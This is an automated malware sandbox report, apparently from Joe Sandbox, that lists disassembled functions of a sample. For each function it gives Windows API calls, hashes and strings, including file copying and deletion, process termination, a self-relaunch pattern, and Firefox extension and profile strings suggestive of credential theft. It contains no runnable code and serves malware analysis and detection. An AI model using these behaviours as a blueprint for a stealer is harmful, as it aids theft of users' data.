Opcode Fuzzy Hash: d86048f8668ea50bb5e5d78fc2f13e62222d90724e777ee8542e60d5572919de
Instruction Fuzzy Hash: C3F03032A477119AEB21FBAC9C01F5D3BA06F0076DF220F19D405EB1D0DBA47541EA9B

Function 004168D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00416903

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

ShellExecuteEx.SHELL32(0000003C), ref: 004169C6
ExitProcess.KERNEL32 ref: 004169F5

Strings

<, xrefs: 00416979

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
String ID: <
API String ID: 1148417306-4251816714
Opcode ID: 80adf956ea99f7686bf73ed2305a0c7c355c3d8c509fc3f8e2274e2124ba97dc
Instruction ID: 69e214fcc2f82cbe4d830bf51364f862e1744f727ac50a07542482e63681b1c7
Opcode Fuzzy Hash: 80adf956ea99f7686bf73ed2305a0c7c355c3d8c509fc3f8e2274e2124ba97dc
Instruction Fuzzy Hash: 82313AB1902218ABDB14EB91DC92FDEB779AF08314F40418EF20566191DF787B88CF69

Function 048D6B37 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 048D6B6A

Part of subcall function 048DACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 048DACFF

Part of subcall function 048DAF27: lstrlen.KERNEL32(?,006D6BF0,?,004250DC,00420E1A), ref: 048DAF3C
Part of subcall function 048DAF27: lstrcpy.KERNEL32(00000000), ref: 048DAF7B
Part of subcall function 048DAF27: lstrcat.KERNEL32(00000000,00000000), ref: 048DAF89

Part of subcall function 048DAE17: lstrcpy.KERNEL32(?,00420E1A), ref: 048DAE7C

ShellExecuteEx.SHELL32(0000003C), ref: 048D6C2D
ExitProcess.KERNEL32 ref: 048D6C5C

Strings

<, xrefs: 048D6BE0

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
String ID: <
API String ID: 1148417306-4251816714
Opcode ID: 780f5d4a84c50e8ab2f554c699b202a56bf3eaf7d4713dd72010fd50ff5fac83
Instruction ID: 6ce2bcb176339d49a4ca82067f5c082335dbe92d432dbb025d3b083f95cba50c
Opcode Fuzzy Hash: 780f5d4a84c50e8ab2f554c699b202a56bf3eaf7d4713dd72010fd50ff5fac83
Instruction Fuzzy Hash: 16312CB1D02218ABEB18EB94DC90FDDB778AF58304F404689E21AE7190DFB46B48CF55

Function 00418EE0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,000000FA,?,?,004196AE,00000000), ref: 00418EEB
HeapAlloc.KERNEL32(00000000,?,?,004196AE,00000000), ref: 00418EF2
wsprintfW.USER32 ref: 00418F08

Strings

%hs, xrefs: 00418EFF

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesswsprintf
String ID: %hs
API String ID: 659108358-2783943728
Opcode ID: a2d1222b377fc3304f55ce0aa2500adad0c2a2d90715c5043ce73364ad1d5f17
Instruction ID: abe7276d6e58fd7f286e9bcc6e4dd5022fdd169b0d4b331efbe0e5b16b2cc016
Opcode Fuzzy Hash: a2d1222b377fc3304f55ce0aa2500adad0c2a2d90715c5043ce73364ad1d5f17
Instruction Fuzzy Hash: 47E08C70E49308BBDB00DB94ED0AF6D77B8EB44302F000196FD0987340EA719F008B96

Function 0040A990 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,02E34B50,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040AA11
lstrlenA.KERNEL32(00000000,00000000), ref: 0040AB2F
lstrlenA.KERNEL32(00000000), ref: 0040ADEC

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 0040A560: memcmp.MSVCRT(?,v20,00000003), ref: 0040A57D

DeleteFileA.KERNEL32(00000000), ref: 0040AE73

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
String ID:
API String ID: 257331557-0
Opcode ID: badd0b16bebf4880951e4b22bfce0ef8fa2e65dd17f4c9611185429b7f8720ee
Instruction ID: 5dfe8597df33c788f82f0551f3ba8d02d272d38f024b71a471f8e3c501a58f6f
Opcode Fuzzy Hash: badd0b16bebf4880951e4b22bfce0ef8fa2e65dd17f4c9611185429b7f8720ee
Instruction Fuzzy Hash: A9E134729111089BCB04FBA5DC66EEE7339AF14314F40855EF11672091EF387A9CCB6A

Function 048CABF7 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 048DACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 048DACFF

Part of subcall function 048DAF27: lstrlen.KERNEL32(?,006D6BF0,?,004250DC,00420E1A), ref: 048DAF3C
Part of subcall function 048DAF27: lstrcpy.KERNEL32(00000000), ref: 048DAF7B
Part of subcall function 048DAF27: lstrcat.KERNEL32(00000000,00000000), ref: 048DAF89

Part of subcall function 048DAE17: lstrcpy.KERNEL32(?,00420E1A), ref: 048DAE7C

Part of subcall function 048D8F57: GetSystemTime.KERNEL32(00420E1B,006D6CA4,004205B6,?,?,048C1660,?,0000001A,00420E1B,00000000,?,006D6BF0,?,004250DC,00420E1A), ref: 048D8F7D

Part of subcall function 048DAE97: lstrcpy.KERNEL32(00000000,?), ref: 048DAEE9
Part of subcall function 048DAE97: lstrcat.KERNEL32(00000000), ref: 048DAEF9

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 048CAC78
lstrlen.KERNEL32(00000000,00000000), ref: 048CAD96
lstrlen.KERNEL32(00000000), ref: 048CB053

Part of subcall function 048DAD17: lstrcpy.KERNEL32(?,00000000), ref: 048DAD5D

Part of subcall function 048CA7C7: memcmp.MSVCRT(?,0042124C,00000003), ref: 048CA7E4

DeleteFileA.KERNEL32(00000000), ref: 048CB0DA

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
String ID:
API String ID: 257331557-0
Opcode ID: 1555e5678c072ca4ab9446b2b40093215d410334d5d224d36f00ead4fe18f37f
Instruction ID: 8a8abec6a76eb09e6f10a6b29cb1e83033ef6da01e4df4cd8bd1655ff4876e66
Opcode Fuzzy Hash: 1555e5678c072ca4ab9446b2b40093215d410334d5d224d36f00ead4fe18f37f
Instruction Fuzzy Hash: 5AE1D172D011189BDB1DFBA8DC90DEE7339AF14205F608A59E557F2090EFB07A48CB62

Function 0040D500 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,02E34B50,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D581
lstrlenA.KERNEL32(00000000), ref: 0040D798
lstrlenA.KERNEL32(00000000), ref: 0040D7AC
DeleteFileA.KERNEL32(00000000), ref: 0040D82B

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 4c1525e857f093a45c2341733fa41754f3496238513f024d29210b144bef9689
Instruction ID: cd95120e3309aa2a4ee5e09d67847ecab6e8b781cb92854c7d2ac691bd2160a2
Opcode Fuzzy Hash: 4c1525e857f093a45c2341733fa41754f3496238513f024d29210b144bef9689
Instruction Fuzzy Hash: CF911672E111089BCB04FBA1EC66DEE7339AF14314F50456EF11672095EF387A98CB6A

Function 048CD767 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 048DACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 048DACFF

Part of subcall function 048DAF27: lstrlen.KERNEL32(?,006D6BF0,?,004250DC,00420E1A), ref: 048DAF3C
Part of subcall function 048DAF27: lstrcpy.KERNEL32(00000000), ref: 048DAF7B
Part of subcall function 048DAF27: lstrcat.KERNEL32(00000000,00000000), ref: 048DAF89

Part of subcall function 048DAE17: lstrcpy.KERNEL32(?,00420E1A), ref: 048DAE7C

Part of subcall function 048D8F57: GetSystemTime.KERNEL32(00420E1B,006D6CA4,004205B6,?,?,048C1660,?,0000001A,00420E1B,00000000,?,006D6BF0,?,004250DC,00420E1A), ref: 048D8F7D

Part of subcall function 048DAE97: lstrcpy.KERNEL32(00000000,?), ref: 048DAEE9
Part of subcall function 048DAE97: lstrcat.KERNEL32(00000000), ref: 048DAEF9

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 048CD7E8
lstrlen.KERNEL32(00000000), ref: 048CD9FF
lstrlen.KERNEL32(00000000), ref: 048CDA13
DeleteFileA.KERNEL32(00000000), ref: 048CDA92

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: c95315d137aedd934db08a2c32def760d310641930853bc4b112f3c5134ffc66
Instruction ID: 1946417bd6611d806eca28cc91da7124d82d9d3c2bbbde0be52db9f1f1f6b539
Opcode Fuzzy Hash: c95315d137aedd934db08a2c32def760d310641930853bc4b112f3c5134ffc66
Instruction Fuzzy Hash: 2591E372D011189BDB1CFBA8DC50DEE7339AF54209F604A69E517F6090EFB47A48CB62

Function 0040D880 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,02E34B50,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D901
lstrlenA.KERNEL32(00000000), ref: 0040DA9F
lstrlenA.KERNEL32(00000000), ref: 0040DAB3
DeleteFileA.KERNEL32(00000000), ref: 0040DB32

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 1acd3d45d618d939c79b20cdc9903d53f52bed8242236e24ba2a76c9b265152c
Instruction ID: 660f6b77f2ff2b442eb80c9f7963c7c0f8ff679996332a2a68bd7dee448c32b7
Opcode Fuzzy Hash: 1acd3d45d618d939c79b20cdc9903d53f52bed8242236e24ba2a76c9b265152c
Instruction Fuzzy Hash: 28812572E111089BCB04FBA5EC66DEE7339AF14314F40455FF10662095EF387A98CB6A

Function 048CDAE7 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 048DACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 048DACFF

Part of subcall function 048DAF27: lstrlen.KERNEL32(?,006D6BF0,?,004250DC,00420E1A), ref: 048DAF3C
Part of subcall function 048DAF27: lstrcpy.KERNEL32(00000000), ref: 048DAF7B
Part of subcall function 048DAF27: lstrcat.KERNEL32(00000000,00000000), ref: 048DAF89

Part of subcall function 048DAE17: lstrcpy.KERNEL32(?,00420E1A), ref: 048DAE7C

Part of subcall function 048D8F57: GetSystemTime.KERNEL32(00420E1B,006D6CA4,004205B6,?,?,048C1660,?,0000001A,00420E1B,00000000,?,006D6BF0,?,004250DC,00420E1A), ref: 048D8F7D

Part of subcall function 048DAE97: lstrcpy.KERNEL32(00000000,?), ref: 048DAEE9
Part of subcall function 048DAE97: lstrcat.KERNEL32(00000000), ref: 048DAEF9

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 048CDB68
lstrlen.KERNEL32(00000000), ref: 048CDD06
lstrlen.KERNEL32(00000000), ref: 048CDD1A
DeleteFileA.KERNEL32(00000000), ref: 048CDD99

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: f963ddadb7543677bfe67c8cf6937e88a8e6e15d5c44649ac160fab5f8c80baf
Instruction ID: d6b3c8288f048356f2586fd736c5aa7af9b52513d05f26c1119037c93a844f59
Opcode Fuzzy Hash: f963ddadb7543677bfe67c8cf6937e88a8e6e15d5c44649ac160fab5f8c80baf
Instruction Fuzzy Hash: 4E810371D011189BDB0CFBA8DC94DEE7339AF54209F604A6DE557E6090EFB47A08CB62

Function 0493F33E Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 0493F405
___AdjustPointer.LIBCMT ref: 0493F428
___AdjustPointer.LIBCMT ref: 0493F4C4

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
Instruction ID: c44fc65f84a02f7015bb1e29d55c113c8ca5a74601f404fa61264a9a6d869332
Opcode Fuzzy Hash: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
Instruction Fuzzy Hash: EA510372E00602AFEB28CF54D848BBA73AAEF82306F14453DE84557298E731F841CB90

Function 0040F5A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA

Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00421678,00420D93), ref: 0040F64C
lstrlenA.KERNEL32(00000000), ref: 0040F66B

Strings

^userContextId=4294967295, xrefs: 0040F69C
moz-extension+++, xrefs: 0040F6AD

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 998311485-3310892237
Opcode ID: 523766ba9e6db3e821a6d2c1536c81079b0302e78173aef5b8d6937599c7b161
Instruction ID: 3808d15f7e0f9f9184562117c9aa29465858450d569164ac2a98ea8b538c64df
Opcode Fuzzy Hash: 523766ba9e6db3e821a6d2c1536c81079b0302e78173aef5b8d6937599c7b161
Instruction Fuzzy Hash: 42517E72E011089BCB04FBA1ECA6DED7339AF54304F40852EF50667195EF386A5CCB6A

Function 00419660 Relevance: 6.1, APIs: 4, Instructions: 89COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0041967B

Part of subcall function 00418EE0: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,004196AE,00000000), ref: 00418EEB
Part of subcall function 00418EE0: HeapAlloc.KERNEL32(00000000,?,?,004196AE,00000000), ref: 00418EF2
Part of subcall function 00418EE0: wsprintfW.USER32 ref: 00418F08

OpenProcess.KERNEL32(00001001,00000000,?), ref: 0041973B
TerminateProcess.KERNEL32(00000000,00000000), ref: 00419759
CloseHandle.KERNEL32(00000000), ref: 00419766

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
String ID:
API String ID: 396451647-0
Opcode ID: 82399361bd33b1cf0f2f2efae6d7ff06a364100a0860e5f280d97042be913252
Instruction ID: 560ccd148ccd609fdd46163d5cc95655726043f4ba77f136f2594cdeec1b1660
Opcode Fuzzy Hash: 82399361bd33b1cf0f2f2efae6d7ff06a364100a0860e5f280d97042be913252
Instruction Fuzzy Hash: C4315BB1E01208DBDB14DFE0DD49BEDB779BF44700F10445AF506AB284EB786A88CB56

Function 048D98C7 Relevance: 6.1, APIs: 4, Instructions: 89COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 048D98E2

Part of subcall function 048D9147: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,048D9915,00000000), ref: 048D9152
Part of subcall function 048D9147: RtlAllocateHeap.NTDLL(00000000), ref: 048D9159
Part of subcall function 048D9147: wsprintfW.USER32 ref: 048D916F

OpenProcess.KERNEL32(00001001,00000000,?), ref: 048D99A2
TerminateProcess.KERNEL32(00000000,00000000), ref: 048D99C0
CloseHandle.KERNEL32(00000000), ref: 048D99CD

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
String ID:
API String ID: 3729781310-0
Opcode ID: 4dd47c962113320da772e9fd3d5ef9085dc50e719928fc1b4404ad0ba2226614
Instruction ID: 55471c04a1f80f9f745e6cf309963db60d4c43b039f74dd488bd83472d1d4689
Opcode Fuzzy Hash: 4dd47c962113320da772e9fd3d5ef9085dc50e719928fc1b4404ad0ba2226614
Instruction Fuzzy Hash: EC311EB1E02248EBDB14DFE4CD48BEDB779BB44304F504959E506AB188EBB46A44CB52

Function 048D8A77 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON

Download Yara Rule

APIs

Part of subcall function 048DACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 048DACFF

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205BF), ref: 048D8AC1
Process32First.KERNEL32(?,00000128), ref: 048D8AD5
Process32Next.KERNEL32(?,00000128), ref: 048D8AEA

